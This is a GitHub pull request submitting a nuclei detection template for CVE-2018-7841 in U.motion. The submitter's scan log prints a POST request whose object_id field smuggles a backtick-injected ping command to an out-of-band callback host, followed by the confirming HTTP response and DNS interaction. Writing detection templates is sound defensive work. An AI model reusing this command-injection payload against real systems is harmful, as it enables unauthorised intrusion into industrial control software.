Create CVE-2018-7841.yaml

[darses]

Template / PR Information

• Add CVE-2018-7841

Template Validation

I've validated this template locally?

• YES
• NO

Additional Details (leave it blank if not applicable)

Can provide additional details via Discord if required.

/claim #12851

[INF] Current nuclei version: v3.4.7 (outdated)
[INF] Current nuclei-templates version: v10.2.7 (latest)
[INF] To view results on cloud dashboard, visit https://cloud.projectdiscovery.io/scans upon scan completion.
[INF] New templates added in latest release: 55
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.pro
[INF] [CVE-2018-7841] Dumped HTTP request for https://REDACTED/umotion/modules/reporting/track_import_export.php

POST /umotion/modules/reporting/track_import_export.php HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 104
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

op=export&language=english&interval=1&object_id=`ping -c 1 REDACTED.oast.pro`
[DBG] [CVE-2018-7841] Dumped HTTP response https://REDACTED/umotion/modules/reporting/track_import_export.php

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Origin,SOAPserver,SOAPaction,Method,Accept,DNT,X-Mx-ReqToken,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE
Content-Disposition: attachment; filename="tracking_log_2025_08_24_00_12_38.csv"
Content-Type: application/octet-stream
Date: Sat, 23 Aug 2025 22:12:38 GMT
Server: nginx/1.1.19
X-Powered-By: PHP/5.4.4-4

"ID";"Object";"Period";"Timestamp";"Year";"Month";"Day";"Time";"Week";"Day of the week";"Initial value";"Final value";"Average value";"Min. value";"Max. value";"Sum";"Counter";"Difference";"Integral"
[REDACTED] Received DNS interaction from REDACTED at 2025-08-23 22:12:37
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 4217
;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;REDACTED.OAst.PrO.    IN       A



------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 4217
;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;REDACTED.OAst.PrO.    IN       A

;; ANSWER SECTION:
REDACTED.OAst.PrO.     3600    IN      A       REDACTED

;; AUTHORITY SECTION:
REDACTED.OAst.PrO.     3600    IN      NS      ns1.oast.pro.
REDACTED.OAst.PrO.     3600    IN      NS      ns2.oast.pro.

;; ADDITIONAL SECTION:
ns1.oast.pro.   3600    IN      A       REDACTED
ns2.oast.pro.   3600    IN      A       REDACTED


[CVE-2018-7841:status-1] [http] [critical] https://REDACTED/umotion/modules/reporting/track_import_export.php
[CVE-2018-7841:word-2] [http] [critical] https://REDACTED/umotion/modules/reporting/track_import_export.php
[CVE-2018-7841:word-3] [http] [critical] https://REDACTED/umotion/modules/reporting/track_import_export.php
[INF] Scan completed in 7.968413309s. 3 matches found.

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server

[ehsandeep]

@projectdiscoveryai reivew

[pussycat0x]

Hi @darses , thanks for sharing this template! Could you also share the Lab Setup Environment with [email protected]